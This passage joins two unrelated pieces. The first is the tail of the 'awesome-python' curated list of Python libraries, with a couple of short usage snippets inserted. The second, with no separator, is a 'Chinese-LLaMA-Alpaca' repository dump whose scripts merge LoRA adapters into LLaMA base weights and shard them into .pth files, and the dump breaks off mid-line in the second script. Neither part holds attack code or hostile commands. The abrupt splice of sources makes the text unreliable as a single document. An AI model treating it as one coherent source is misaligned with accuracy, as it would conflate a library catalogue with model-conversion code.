[pysolr](https://github.com/django-haystack/pysolr) - A lightweight Python wrapper for [Apache Solr](https://lucene.apache.org/solr/). * [whoosh](http://whoosh.readthedocs.io/en/latest/) - A fast, pure Python search engine library. ## Serialization *Libraries for serializing complex data types* * [marshmallow](https://github.com/marshmallow-code/marshmallow) - A lightweight library for converting complex objects to and from simple Python datatypes. * [pysimdjson](https://github.com/TkTech/pysimdjson) - A Python bindings for [simdjson](https://github.com/lemire/simdjson). * [python-rapidjson](https://github.com/python-rapidjson/python-rapidjson) - A Python wrapper around [RapidJSON](https://github.com/Tencent/rapidjson). * [ultrajson](https://github.com/esnme/ultrajson) - A fast JSON decoder and encoder written in C with Python bindings. 
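To make the serialization entries above a bit more concrete, the following is a small sketch in the style of marshmallow's schema API (the schema and field names are made up purely for illustration):

```python
# A hedged sketch of marshmallow-style (de)serialization; the schema is illustrative only.
from datetime import date
from marshmallow import Schema, fields

class ArtistSchema(Schema):
    name = fields.Str()
    founded = fields.Date()

schema = ArtistSchema()

# dump(): Python object/dict -> plain datatypes ready for json.dumps()
print(schema.dump({"name": "Kraftwerk", "founded": date(1970, 1, 1)}))

# load(): plain datatypes -> validated Python data (raises ValidationError on bad input)
print(schema.load({"name": "Kraftwerk", "founded": "1970-01-01"}))
```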
## Serverless Frameworks

*Frameworks for developing serverless Python code.*

* [python-lambda](https://github.com/nficano/python-lambda) - A toolkit for developing and deploying Python code in AWS Lambda.
* [Zappa](https://github.com/zappa/Zappa) - A tool for deploying WSGI applications on AWS Lambda and API Gateway.

## Shell

*Shells based on Python.*

* [xonsh](https://github.com/xonsh/xonsh/) - A Python-powered, cross-platform, Unix-gazing shell language and command prompt.

## Specific Formats Processing

*Libraries for parsing and manipulating specific text formats.*

* General
    * [tablib](https://github.com/jazzband/tablib) - A module for Tabular Datasets in XLS, CSV, JSON, YAML (a short sketch appears just before the Task Queues section below).
* Office
    * [docxtpl](https://github.com/elapouya/python-docx-template) - Editing a docx document by jinja2 template.
    * [openpyxl](https://openpyxl.readthedocs.io/en/stable/) - A library for reading and writing Excel 2010 xlsx/xlsm/xltx/xltm files.
    * [pyexcel](https://github.com/pyexcel/pyexcel) - Providing one API for reading, manipulating and writing csv, ods, xls, xlsx and xlsm files.
    * [python-docx](https://github.com/python-openxml/python-docx) - Reads, queries and modifies Microsoft Word 2007/2008 docx files.
    * [python-pptx](https://github.com/scanny/python-pptx) - Python library for creating and updating PowerPoint (.pptx) files.
    * [unoconv](https://github.com/unoconv/unoconv) - Convert between any document format supported by LibreOffice/OpenOffice.
    * [XlsxWriter](https://github.com/jmcnamara/XlsxWriter) - A Python module for creating Excel .xlsx files.
    * [xlwings](https://github.com/ZoomerAnalytics/xlwings) - A BSD-licensed library that makes it easy to call Python from Excel and vice versa.
    * [xlwt](https://github.com/python-excel/xlwt) / [xlrd](https://github.com/python-excel/xlrd) - Writing and reading data and formatting information from Excel files.
* PDF
    * [pdfminer.six](https://github.com/pdfminer/pdfminer.six) - Pdfminer.six is a community maintained fork of the original PDFMiner.
    * [PyPDF2](https://github.com/mstamy2/PyPDF2) - A library capable of splitting, merging and transforming PDF pages.
    * [ReportLab](https://www.reportlab.com/opensource/) - Allowing rapid creation of rich PDF documents.
* Markdown
    * [Mistune](https://github.com/lepture/mistune) - Fastest and full featured pure Python parser of Markdown.
    * [Python-Markdown](https://github.com/waylan/Python-Markdown) - A Python implementation of John Gruber’s Markdown.
* YAML
    * [PyYAML](http://pyyaml.org/) - YAML implementations for Python.
* CSV
    * [csvkit](https://github.com/wireservice/csvkit) - Utilities for converting to and working with CSV.
* Archive
    * [unp](https://github.com/mitsuhiko/unp) - A command line tool that can unpack archives easily.

## Static Site Generator

*A static site generator is a piece of software that takes some text + templates as input and produces HTML files as output.*

* [lektor](https://github.com/lektor/lektor) - An easy to use static CMS and blog engine.
* [mkdocs](https://github.com/mkdocs/mkdocs/) - Markdown friendly documentation generator.
* [makesite](https://github.com/sunainapai/makesite) - Simple, lightweight, and magic-free static site/blog generator (< 130 lines).
* [nikola](https://github.com/getnikola/nikola) - A static website and blog generator.
* [pelican](https://github.com/getpelican/pelican) - Static site generator that supports Markdown and reST syntax.

## Tagging

*Libraries for tagging items.*

* [django-taggit](https://github.com/jazzband/django-taggit) - Simple tagging for Django.
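Following up on the tablib entry under Specific Formats Processing above, here is a small, hedged sketch of its `Dataset` API (the headers and rows are invented sample data):

```python
# A minimal tablib sketch; headers and rows are made-up sample data.
import tablib

data = tablib.Dataset()
data.headers = ["name", "category"]
data.append(["requests", "HTTP client"])
data.append(["tablib", "tabular data"])

# Export the same dataset to any supported tabular format.
print(data.export("csv"))
# print(data.export("json"))  # other formats (xls, xlsx, yaml, ...) may require optional extras
```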
## Task Queues

*Libraries for working with task queues.*

* [celery](https://docs.celeryproject.org/en/stable/) - An asynchronous task queue/job queue based on distributed message passing.
* [dramatiq](https://github.com/Bogdanp/dramatiq) - A fast and reliable background task processing library for Python 3.
* [huey](https://github.com/coleifer/huey) - Little multi-threaded task queue.
* [mrq](https://github.com/pricingassistant/mrq) - A distributed worker task queue in Python using Redis & gevent.
* [rq](https://github.com/rq/rq) - Simple job queues for Python.

## Template Engine

*Libraries and tools for templating and lexing.*

* [Genshi](https://genshi.edgewall.org/) - Python templating toolkit for generation of web-aware output.
* [Jinja2](https://github.com/pallets/jinja) - A modern and designer friendly templating language.
* [Mako](http://www.makotemplates.org/) - Hyperfast and lightweight templating for the Python platform.

## Testing

*Libraries for testing codebases and generating test data.*

* Testing Frameworks
    * [hypothesis](https://github.com/HypothesisWorks/hypothesis) - Hypothesis is an advanced Quickcheck style property based testing library.
    * [nose2](https://github.com/nose-devs/nose2) - The successor to `nose`, based on `unittest2`.
    * [pytest](https://docs.pytest.org/en/latest/) - A mature full-featured Python testing tool.
    * [Robot Framework](https://github.com/robotframework/robotframework) - A generic test automation framework.
    * [unittest](https://docs.python.org/3/library/unittest.html) - (Python standard library) Unit testing framework.
* Test Runners
    * [green](https://github.com/CleanCut/green) - A clean, colorful test runner.
    * [mamba](http://nestorsalceda.github.io/mamba/) - The definitive testing tool for Python. Born under the banner of BDD.
    * [tox](https://tox.readthedocs.io/en/latest/) - Auto builds and tests distributions in multiple Python versions.
* GUI / Web Testing
    * [locust](https://github.com/locustio/locust) - Scalable user load testing tool written in Python.
    * [PyAutoGUI](https://github.com/asweigart/pyautogui) - PyAutoGUI is a cross-platform GUI automation Python module for human beings.
    * [Schemathesis](https://github.com/kiwicom/schemathesis) - A tool for automatic property-based testing of web applications built with Open API / Swagger specifications.
    * [Selenium](https://pypi.org/project/selenium/) - Python bindings for [Selenium](http://www.seleniumhq.org/) WebDriver.
    * [sixpack](https://github.com/seatgeek/sixpack) - A language-agnostic A/B Testing framework.
    * [splinter](https://github.com/cobrateam/splinter) - Open source tool for testing web applications.
* Mock
    * [doublex](https://pypi.org/project/doublex/) - Powerful test doubles framework for Python.
    * [freezegun](https://github.com/spulec/freezegun) - Travel through time by mocking the datetime module.
    * [httmock](https://github.com/patrys/httmock) - A mocking library for requests for Python 2.6+ and 3.2+.
    * [httpretty](https://github.com/gabrielfalcao/HTTPretty) - HTTP request mock tool for Python.
    * [mock](https://docs.python.org/3/library/unittest.mock.html) - (Python standard library) A mocking and patching library.
    * [mocket](https://github.com/mindflayer/python-mocket) - A socket mock framework with gevent/asyncio/SSL support.
    * [responses](https://github.com/getsentry/responses) - A utility library for mocking out the requests Python library.
    * [VCR.py](https://github.com/kevin1024/vcrpy) - Record and replay HTTP interactions on your tests.
* Object Factories
    * [factory_boy](https://github.com/FactoryBoy/factory_boy) - A test fixtures replacement for Python.
    * [mixer](https://github.com/klen/mixer) - Another fixtures replacement. Supports Django, Flask, SQLAlchemy, Peewee, etc.
    * [model_mommy](https://github.com/vandersonmota/model_mommy) - Creating random fixtures for testing in Django.
* Code Coverage
    * [coverage](https://pypi.org/project/coverage/) - Code coverage measurement.
* Fake Data
    * [fake2db](https://github.com/emirozer/fake2db) - Fake database generator.
    * [faker](https://github.com/joke2k/faker) - A Python package that generates fake data.
    * [mimesis](https://github.com/lk-geimfari/mimesis) - A Python library that helps you generate fake data.
    * [radar](https://pypi.org/project/radar/) - Generate random datetime / time.

## Text Processing

*Libraries for parsing and manipulating plain texts.*

* General
    * [chardet](https://github.com/chardet/chardet) - Python 2/3 compatible character encoding detector.
    * [difflib](https://docs.python.org/3/library/difflib.html) - (Python standard library) Helpers for computing deltas.
    * [ftfy](https://github.com/LuminosoInsight/python-ftfy) - Makes Unicode text less broken and more consistent automagically.
    * [fuzzywuzzy](https://github.com/seatgeek/fuzzywuzzy) - Fuzzy String Matching.
    * [Levenshtein](https://github.com/ztane/python-Levenshtein/) - Fast computation of Levenshtein distance and string similarity.
    * [pangu.py](https://github.com/vinta/pangu.py) - Paranoid text spacing.
    * [pyfiglet](https://github.com/pwaller/pyfiglet) - An implementation of figlet written in Python.
    * [pypinyin](https://github.com/mozillazg/python-pinyin) - Convert Chinese hanzi (漢字) to pinyin (拼音).
    * [textdistance](https://github.com/orsinium/textdistance) - Compute distance between sequences with 30+ algorithms.
    * [unidecode](https://pypi.org/project/Unidecode/) - ASCII transliterations of Unicode text.
* Slugify
    * [awesome-slugify](https://github.com/dimka665/awesome-slugify) - A Python slugify library that can preserve unicode.
    * [python-slugify](https://github.com/un33k/python-slugify) - A Python slugify library that translates unicode to ASCII.
    * [unicode-slugify](https://github.com/mozilla/unicode-slugify) - A slugifier that generates unicode slugs with Django as a dependency.
* Unique identifiers
    * [hashids](https://github.com/davidaurelio/hashids-python) - Implementation of [hashids](http://hashids.org) in Python.
    * [shortuuid](https://github.com/skorokithakis/shortuuid) - A generator library for concise, unambiguous and URL-safe UUIDs.
* Parser
    * [ply](https://github.com/dabeaz/ply) - Implementation of lex and yacc parsing tools for Python.
    * [pygments](http://pygments.org/) - A generic syntax highlighter.
    * [pyparsing](https://github.com/pyparsing/pyparsing) - A general purpose framework for generating parsers.
    * [python-nameparser](https://github.com/derek73/python-nameparser) - Parsing human names into their individual components.
    * [python-phonenumbers](https://github.com/daviddrysdale/python-phonenumbers) - Parsing, formatting, storing and validating international phone numbers.
    * [python-user-agents](https://github.com/selwin/python-user-agents) - Browser user agent parser.
    * [sqlparse](https://github.com/andialbrecht/sqlparse) - A non-validating SQL parser.

## Third-party APIs

*Libraries for accessing third party services APIs.
Also see [List of Python API Wrappers and Libraries](https://github.com/realpython/list-of-python-api-wrappers).* * [apache-libcloud](https://libcloud.apache.org/) - One Python library for all clouds. * [boto3](https://github.com/boto/boto3) - Python interface to Amazon Web Services. * [django-wordpress](https://github.com/istrategylabs/django-wordpress) - WordPress models and views for Django. * [facebook-sdk](https://github.com/mobolic/facebook-sdk) - Facebook Platform Python SDK. * [google-api-python-client](https://github.com/google/google-api-python-client) - Google APIs Client Library for Python. * [gspread](https://github.com/burnash/gspread) - Google Spreadsheets Python API. * [twython](https://github.com/ryanmcgrath/twython) - A Python wrapper for the Twitter API. ## URL Manipulation *Libraries for parsing URLs.* * [furl](https://github.com/gruns/furl) - A small Python library that makes parsing and manipulating URLs easy. * [purl](https://github.com/codeinthehole/purl) - A simple, immutable URL class with a clean API for interrogation and manipulation. * [pyshorteners](https://github.com/ellisonleao/pyshorteners) - A pure Python URL shortening lib. * [webargs](https://github.com/marshmallow-code/webargs) - A friendly library for parsing HTTP request arguments with built-in support for popular web frameworks. ## Video *Libraries for manipulating video and GIFs.* * [moviepy](https://zulko.github.io/moviepy/) - A module for script-based movie editing with many formats, including animated GIFs. * [scikit-video](https://github.com/aizvorski/scikit-video) - Video processing routines for SciPy. * [vidgear](https://github.com/abhiTronix/vidgear) - Most Powerful multi-threaded Video Processing framework. ## Web Asset Management *Tools for managing, compressing and minifying website assets.* * [django-compressor](https://github.com/django-compressor/django-compressor) - Compresses linked and inline JavaScript or CSS into a single cached file. * [django-pipeline](https://github.com/jazzband/django-pipeline) - An asset packaging library for Django. * [django-storages](https://github.com/jschneier/django-storages) - A collection of custom storage back ends for Django. * [fanstatic](http://www.fanstatic.org/en/latest/) - Packages, optimizes, and serves static file dependencies as Python packages. * [fileconveyor](http://wimleers.com/fileconveyor) - A daemon to detect and sync files to CDNs, S3 and FTP. * [flask-assets](https://github.com/miracle2k/flask-assets) - Helps you integrate webassets into your Flask app. * [webassets](https://github.com/miracle2k/webassets) - Bundles, optimizes, and manages unique cache-busting URLs for static resources. ## Web Content Extracting *Libraries for extracting web contents.* * [html2text](https://github.com/Alir3z4/html2text) - Convert HTML to Markdown-formatted text. * [lassie](https://github.com/michaelhelmick/lassie) - Web Content Retrieval for Humans. * [micawber](https://github.com/coleifer/micawber) - A small library for extracting rich content from URLs. * [newspaper](https://github.com/codelucas/newspaper) - News extraction, article extraction and content curation in Python. * [python-readability](https://github.com/buriy/python-readability) - Fast Python port of arc90's readability tool. * [requests-html](https://github.com/psf/requests-html) - Pythonic HTML Parsing for Humans. * [sumy](https://github.com/miso-belica/sumy) - A module for automatic summarization of text documents and HTML pages. 
* [textract](https://github.com/deanmalmgren/textract) - Extract text from any document, Word, PowerPoint, PDFs, etc. * [toapi](https://github.com/gaojiuli/toapi) - Every web site provides APIs. ## Web Crawling *Libraries to automate web scraping.* * [feedparser](https://github.com/kurtmckee/feedparser) - Universal feed parser. * [grab](https://github.com/lorien/grab) - Site scraping framework. * [mechanicalsoup](https://github.com/MechanicalSoup/MechanicalSoup) - A Python library for automating interaction with websites. * [scrapy](https://github.com/scrapy/scrapy) - A fast high-level screen scraping and web crawling framework. ## Web Frameworks *Traditional full stack web frameworks. Also see [RESTful API](https://github.com/vinta/awesome-python#restful-api).* * Synchronous * [django](https://github.com/django/django) - The most popular web framework in Python. * [awesome-django](https://github.com/shahraizali/awesome-django) * [awesome-django](https://github.com/wsvincent/awesome-django) * [flask](https://github.com/pallets/flask) - A microframework for Python. * [awesome-flask](https://github.com/humiaozuzu/awesome-flask) * [pyramid](https://pylonsproject.org/) - A small, fast, down-to-earth, open source Python web framework. * [awesome-pyramid](https://github.com/uralbash/awesome-pyramid) * [masonite](https://github.com/MasoniteFramework/masonite) - The modern and developer centric Python web framework. * Asynchronous * [tornado](https://github.com/tornadoweb/tornado) - A web framework and asynchronous networking library. ## WebSocket *Libraries for working with WebSocket.* * [autobahn-python](https://github.com/crossbario/autobahn-python) - WebSocket & WAMP for Python on Twisted and [asyncio](https://docs.python.org/3/library/asyncio.html). * [channels](https://github.com/django/channels) - Developer-friendly asynchrony for Django. * [websockets](https://github.com/aaugustin/websockets) - A library for building WebSocket servers and clients with a focus on correctness and simplicity. ## WSGI Servers *WSGI-compatible web servers.* * [gunicorn](https://github.com/benoitc/gunicorn) - Pre-forked, ported from Ruby's Unicorn project. * [uwsgi](https://uwsgi-docs.readthedocs.io/en/latest/) - A project aims at developing a full stack for building hosting services, written in C. * [waitress](https://github.com/Pylons/waitress) - Multi-threaded, powers Pyramid. * [werkzeug](https://github.com/pallets/werkzeug) - A WSGI utility library for Python that powers Flask and can easily be embedded into your own projects. # Resources Where to discover learning resources or new Python libraries. ## Newsletters * [Awesome Python Newsletter](http://python.libhunt.com/newsletter) * [Pycoder's Weekly](https://pycoders.com/) * [Python Tricks](https://realpython.com/python-tricks/) * [Python Weekly](https://www.pythonweekly.com/) ## Podcasts * [Django Chat](https://djangochat.com/) * [Python Bytes](https://pythonbytes.fm) * [Talk Python To Me](https://talkpython.fm/) * [Python Test](https://podcast.pythontest.com/) * [The Real Python Podcast](https://realpython.com/podcasts/rpp/) # Contributing Your contributions are always welcome! Please take a look at the [contribution guidelines](https://github.com/vinta/awesome-python/blob/master/CONTRIBUTING.md) first. - - - If you have any question about this opinionated list, do not hesitate to contact me [@VintaChen](https://twitter.com/VintaChen) on Twitter or open an issue on GitHub.
Chinese-LLaMA-Alpaca
f213c2c53e92f2bfb41859ffdb2cf47a261c24fb
File: scripts/merge_llama_with_chinese_lora.py """ Usage: python merge_llama_with_chinese_lora.py \ --base_model path/to/llama/model \ --lora_model path/to/first/lora/model [path/to/second/lora/model] \ --output_type [pth|huggingface] \ --output_dir path/to/output/dir """ import argparse import json import os import gc import torch import peft from peft import PeftModel from transformers import LlamaForCausalLM, LlamaTokenizer from huggingface_hub import hf_hub_download parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, required=True, type=str, help="Please specify a base_model") parser.add_argument('--lora_model', default=None, required=True, type=str, help="Please specify LoRA models to be merged (ordered); use commas to separate multiple LoRA models.") parser.add_argument('--offload_dir', default=None, type=str, help="(Optional) Please specify a temp folder for offloading (useful for low-RAM machines). Default None (disable offload).") parser.add_argument('--output_type', default='pth',choices=['pth','huggingface'], type=str, help="save the merged model in pth or huggingface format.") parser.add_argument('--output_dir', default='./', type=str) emb_to_model_size = { 4096 : '7B', 5120 : '13B', 6656 : '33B', 8192 : '65B', } num_shards_of_models = {'7B': 1, '13B': 2, '33B': 4, '65B': 8} params_of_models = { '7B': { "dim": 4096, "multiple_of": 256, "n_heads": 32, "n_layers": 32, "norm_eps": 1e-06, "vocab_size": -1, }, '13B': { "dim": 5120, "multiple_of": 256, "n_heads": 40, "n_layers": 40, "norm_eps": 1e-06, "vocab_size": -1, }, '33B': { "dim": 6656, "multiple_of": 256, "n_heads": 52, "n_layers": 60, "norm_eps": 1e-06, "vocab_size": -1, }, '65B': { "dim": 8192, "multiple_of": 256, "n_heads": 64, "n_layers": 80, "norm_eps": 1e-05, "vocab_size": -1, }, } def transpose(weight, fan_in_fan_out): return weight.T if fan_in_fan_out else weight # Borrowed and modified from https://github.com/tloen/alpaca-lora def translate_state_dict_key(k): k = k.replace("base_model.model.", "") if k == "model.embed_tokens.weight": return "tok_embeddings.weight" elif k == "model.norm.weight": return "norm.weight" elif k == "lm_head.weight": return "output.weight" elif k.startswith("model.layers."): layer = k.split(".")[2] if k.endswith(".self_attn.q_proj.weight"): return f"layers.{layer}.attention.wq.weight" elif k.endswith(".self_attn.k_proj.weight"): return f"layers.{layer}.attention.wk.weight" elif k.endswith(".self_attn.v_proj.weight"): return f"layers.{layer}.attention.wv.weight" elif k.endswith(".self_attn.o_proj.weight"): return f"layers.{layer}.attention.wo.weight" elif k.endswith(".mlp.gate_proj.weight"): return f"layers.{layer}.feed_forward.w1.weight" elif k.endswith(".mlp.down_proj.weight"): return f"layers.{layer}.feed_forward.w2.weight" elif k.endswith(".mlp.up_proj.weight"): return f"layers.{layer}.feed_forward.w3.weight" elif k.endswith(".input_layernorm.weight"): return f"layers.{layer}.attention_norm.weight" elif k.endswith(".post_attention_layernorm.weight"): return f"layers.{layer}.ffn_norm.weight" elif k.endswith("rotary_emb.inv_freq") or "lora" in k: return None else: print(layer, k) raise NotImplementedError else: print(k) raise NotImplementedError def unpermute(w): return ( w.view(n_heads, 2, dim // n_heads // 2, dim).transpose(1, 2).reshape(dim, dim) ) def save_shards(model_sd, num_shards: int): # Add the no_grad context manager with torch.no_grad(): if num_shards == 1: new_state_dict = {} for k, v in model_sd.items(): new_k = translate_state_dict_key(k) if 
new_k is not None: if "wq" in new_k or "wk" in new_k: new_state_dict[new_k] = unpermute(v) else: new_state_dict[new_k] = v os.makedirs(output_dir, exist_ok=True) print(f"Saving shard 1 of {num_shards} into {output_dir}/consolidated.00.pth") torch.save(new_state_dict, output_dir + "/consolidated.00.pth") with open(output_dir + "/params.json", "w") as f: json.dump(params, f) else: new_state_dicts = [dict() for _ in range(num_shards)] for k in list(model_sd.keys()): v = model_sd[k] new_k = translate_state_dict_key(k) if new_k is not None: if new_k=='tok_embeddings.weight': print(f"Processing {new_k}") assert v.size(1)%num_shards==0 splits = v.split(v.size(1)//num_shards,dim=1) elif new_k=='output.weight': print(f"Processing {new_k}") if v.size(0)%num_shards==0: splits = v.split(v.size(0)//num_shards,dim=0) else: size_list = [v.size(0)//num_shards] * num_shards size_list[-1] += v.size(0)%num_shards splits = v.split(size_list, dim=0) # 13B: size_list == [24976,24977] elif new_k=='norm.weight': print(f"Processing {new_k}") splits = [v] * num_shards elif 'ffn_norm.weight' in new_k: print(f"Processing {new_k}") splits = [v] * num_shards elif 'attention_norm.weight' in new_k: print(f"Processing {new_k}") splits = [v] * num_shards elif 'w1.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(0)//num_shards,dim=0) elif 'w2.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(1)//num_shards,dim=1) elif 'w3.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(0)//num_shards,dim=0) elif 'wo.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(1)//num_shards,dim=1) elif 'wv.weight' in new_k: print(f"Processing {new_k}") splits = v.split(v.size(0)//num_shards,dim=0) elif "wq.weight" in new_k or "wk.weight" in new_k: print(f"Processing {new_k}") v = unpermute(v) splits = v.split(v.size(0)//num_shards,dim=0) else: print(f"Unexpected key {new_k}") raise ValueError for sd,split in zip(new_state_dicts,splits): sd[new_k] = split.clone() del split del splits del model_sd[k],v gc.collect() # Effectively enforce garbage collection os.makedirs(output_dir, exist_ok=True) for i,new_state_dict in enumerate(new_state_dicts): print(f"Saving shard {i+1} of {num_shards} into {output_dir}/consolidated.0{i}.pth") torch.save(new_state_dict, output_dir + f"/consolidated.0{i}.pth") with open(output_dir + "/params.json", "w") as f: print(f"Saving params.json into {output_dir}/params.json") json.dump(params, f) if __name__=='__main__': args = parser.parse_args() base_model_path = args.base_model lora_model_paths = [s.strip() for s in args.lora_model.split(',') if len(s.strip())!=0] output_dir = args.output_dir output_type = args.output_type offload_dir = args.offload_dir print(f"Base model: {base_model_path}") print(f"LoRA model(s) {lora_model_paths}:") if offload_dir is not None: # Load with offloading, which is useful for low-RAM machines. # Note that if you have enough RAM, please use original method instead, as it is faster. 
base_model = LlamaForCausalLM.from_pretrained( base_model_path, load_in_8bit=False, torch_dtype=torch.float16, offload_folder=offload_dir, offload_state_dict=True, low_cpu_mem_usage=True, device_map={"": "cpu"}, ) else: # Original method without offloading base_model = LlamaForCausalLM.from_pretrained( base_model_path, load_in_8bit=False, torch_dtype=torch.float16, device_map={"": "cpu"}, ) ## infer the model size from the checkpoint embedding_size = base_model.get_input_embeddings().weight.size(1) model_size = emb_to_model_size[embedding_size] print(f"Peft version: {peft.__version__}") print(f"Loading LoRA for {model_size} model") lora_model = None lora_model_sd = None for lora_index, lora_model_path in enumerate(lora_model_paths): print(f"Loading LoRA {lora_model_path}...") tokenizer = LlamaTokenizer.from_pretrained(lora_model_path) print(f"base_model vocab size: {base_model.get_input_embeddings().weight.size(0)}") print(f"tokenizer vocab size: {len(tokenizer)}") model_vocab_size = base_model.get_input_embeddings().weight.size(0) assert len(tokenizer) >= model_vocab_size, \ (f"The vocab size of the tokenizer {len(tokenizer)} is smaller than the vocab size of the base model {model_vocab_size}\n" "This is not the intended use. Please check your model and tokenizer.") if model_vocab_size != len(tokenizer): base_model.resize_token_embeddings(len(tokenizer)) print(f"Extended vocabulary size to {len(tokenizer)}") first_weight = base_model.model.layers[0].self_attn.q_proj.weight first_weight_old = first_weight.clone() print(f"Loading LoRA weights") if hasattr(peft.LoraModel,'merge_and_unload'): try: lora_model = PeftModel.from_pretrained( base_model, lora_model_path, device_map={"": "cpu"}, torch_dtype=torch.float16, ) except RuntimeError as e: if '[49953, 4096]' in str(e): print("The vocab size of the tokenizer does not match the vocab size of the LoRA weight. \n" "Did you misuse the LLaMA tokenizer with the Alpaca-LoRA weight?\n" "Make sure that you use LLaMA tokenizer with the LLaMA-LoRA weight and Alpaca tokenizer with the Alpaca-LoRA weight!") raise e assert torch.allclose(first_weight_old, first_weight) print(f"Merging with merge_and_unload...") base_model = lora_model.merge_and_unload() else: base_model_sd = base_model.state_dict() try: lora_model_sd = torch.load(os.path.join(lora_model_path,'adapter_model.bin'),map_location='cpu') except FileNotFoundError: print("Cannot find lora model on the disk. Downloading lora model from hub...") filename = hf_hub_download(repo_id=lora_model_path,filename='adapter_model.bin') lora_model_sd = torch.load(filename,map_location='cpu') if 'base_model.model.model.embed_tokens.weight' in lora_model_sd: assert lora_model_sd['base_model.model.model.embed_tokens.weight'].shape[0]==len(tokenizer), \ ("The vocab size of the tokenizer does not match the vocab size of the LoRA weight. 
\n" "Did you misuse the LLaMA tokenizer with the Alpaca-LoRA weight?\n" "Make sure that you use LLaMA tokenizer with the LLaMA-LoRA weight and Alpaca tokenizer with the Alpaca-LoRA weight!") lora_config = peft.LoraConfig.from_pretrained(lora_model_path) lora_scaling = lora_config.lora_alpha / lora_config.r fan_in_fan_out = lora_config.fan_in_fan_out lora_keys = [k for k in lora_model_sd if 'lora_A' in k] non_lora_keys = [k for k in lora_model_sd if not 'lora_' in k] for k in non_lora_keys: print(f"merging {k}") original_k = k.replace('base_model.model.','') base_model_sd[original_k].copy_(lora_model_sd[k]) for k in lora_keys: print(f"merging {k}") original_key = k.replace('.lora_A','').replace('base_model.model.','') assert original_key in base_model_sd lora_a_key = k lora_b_key = k.replace('lora_A','lora_B') base_model_sd[original_key] += ( transpose(lora_model_sd[lora_b_key].float() @ lora_model_sd[lora_a_key].float(),fan_in_fan_out) * lora_scaling ) assert base_model_sd[original_key].dtype == torch.float16 # did we do anything? assert not torch.allclose(first_weight_old, first_weight) tokenizer.save_pretrained(output_dir) if output_type=='huggingface': print("Saving to Hugging Face format...") LlamaForCausalLM.save_pretrained(base_model, output_dir) #, state_dict=deloreanized_sd) else: # output_type=='pth print("Saving to pth format...") base_model_sd = base_model.state_dict() del lora_model, base_model, lora_model_sd params = params_of_models[model_size] num_shards = num_shards_of_models[model_size] n_layers = params["n_layers"] n_heads = params["n_heads"] dim = params["dim"] dims_per_head = dim // n_heads base = 10000.0 inv_freq = 1.0 / (base ** (torch.arange(0, dims_per_head, 2).float() / dims_per_head)) save_shards(model_sd=base_model_sd, num_shards=num_shards) File: scripts/merge_llama_with_chinese_lora_low_mem.py """ Usage: python merge_llama_with_chinese_lora_low_mem.py \ --base_model path/to/llama/model \ --lora_model path/to/first/lora[,path/to/second/lora] \ --output_type [pth|huggingface] \ --output_dir path/to/output/dir """ import argparse import json import os import gc import torch import peft from transformers import LlamaTokenizer from transformers.modeling_utils import dtype_byte_size from huggingface_hub import snapshot_download import re parser = argparse.ArgumentParser() parser.add_argument('--base_model', default=None, required=True, type=str, help="Please specify a base model") parser.add_argument('--lora_model', default=None, required=True, type=str, help="Please specify LoRA models to be merged (ordered); use commas to separate multiple LoRA models") parser.add_argument('--output_type', default='pth',choices=['pth','huggingface'], type=str, help="Save the merged model in pth or huggingface format") parser.add_argument('--output_dir', default='./merged_model', type=str, help="The output folder to save the merged model") parser.add_argument('--verbose', default=False, action='store_true', help="Show detailed messages") emb_to_model_size = { 4096 : '7B', 5120 : '13B', 6656 : '33B', 8192 : '65B', } num_shards_of_models = {'7B': 1, '13B': 2, '33B': 4, '65B': 8} params_of_models = { '7B': { "dim": 4096, "multiple_of": 256, "n_heads": 32, "n_layers": 32, "norm_eps": 1e-06, "vocab_size": -1, }, '13B': { "dim": 5120, "multiple_of": 256, "n_heads": 40, "n_layers": 40, "norm_eps": 1e-06, "vocab_size": -1, }, '33B': { "dim": 6656, "multiple_of": 256, "n_heads": 52, "n_layers": 60, "norm_eps": 1e-06, "vocab_size": -1, }, '65B': { "dim": 8192, "multiple_of": 256, "n_heads": 
64, "n_layers": 80, "norm_eps": 1e-05, "vocab_size": -1, }, } def transpose(weight, fan_in_fan_out): return weight.T if fan_in_fan_out else weight # Borrowed and modified from https://github.com/tloen/alpaca-lora def translate_state_dict_key(k): k = k.replace("base_model.model.", "") if k == "model.embed_tokens.weight": return "tok_embeddings.weight" elif k == "model.norm.weight": return "norm.weight" elif k == "lm_head.weight": return "output.weight" elif k.startswith("model.layers."): layer = k.split(".")[2] if k.endswith(".self_attn.q_proj.weight"): return f"layers.{layer}.attention.wq.weight" elif k.endswith(".self_attn.k_proj.weight"): return f"layers.{layer}.attention.wk.weight" elif k.endswith(".self_attn.v_proj.weight"): return f"layers.{layer}.attention.wv.weight" elif k.endswith(".self_attn.o_proj.weight"): return f"layers.{layer}.attention.wo.weight" elif k.endswith(".mlp.gate_proj.weight"): return f"layers.{layer}.feed_forward.w1.weight" elif k.endswith(".mlp.down_proj.weight"): return f"layers.{layer}.feed_forward.w2.weight" elif k.endswith(".mlp.up_proj.weight"): return f"layers.{layer}.feed_forward.w3.weight" elif k.endswith(".input_layernorm.weight"): return f"layers.{layer}.attention_norm.weight" elif k.endswith(".post_attention_layernorm.weight"): return f"layers.{layer}.ffn_norm.weight" elif k.endswith("rotary_emb.inv_freq") or "lora" in k: return None else: print(layer, k) raise NotImplementedError else: print(k) raise NotImplementedError def unpermute(w): return ( w.view(n_heads, 2, dim // n_heads // 2, dim).transpose(1, 2).reshape(dim, dim) ) def save_shards(model_sd, num_shards: int, prefix="", verbose=False): """ Convert and save the HF format weights to PTH format weights """ with torch.no_grad(): if num_shards == 1: new_state_dict = {} for k, v in model_sd.items(): new_k = translate_state_dict_key(k) if new_k is not None: if "wq" in new_k or "wk" in new_k: new_state_dict[new_k] = unpermute(v) else: new_state_dict[new_k] = v os.makedirs(output_dir, exist_ok=True) print(f"Saving shard 1 of {num_shards} into {output_dir}/{prefix}consolidated.00.pth") torch.save(new_state_dict, output_dir + f"/{prefix}consolidated.00.pth") else: new_state_dicts = [dict() for _ in range(num_shards)] for k in list(model_sd.keys()): v = model_sd[k] new_k = translate_state_dict_key(k) if new_k is not None: if new_k=='tok_embeddings.weight': assert v.size(1)%num_shards==0 splits = v.split(v.size(1)//num_shards,dim=1) elif new_k=='output.weight': if v.size(0)%num_shards==0: splits = v.split(v.size(0)//num_shards,dim=0) else: size_list = [v.size(0)//num_shards] * num_shards size_list[-1] += v.size(0)%num_shards splits = v.split(size_list, 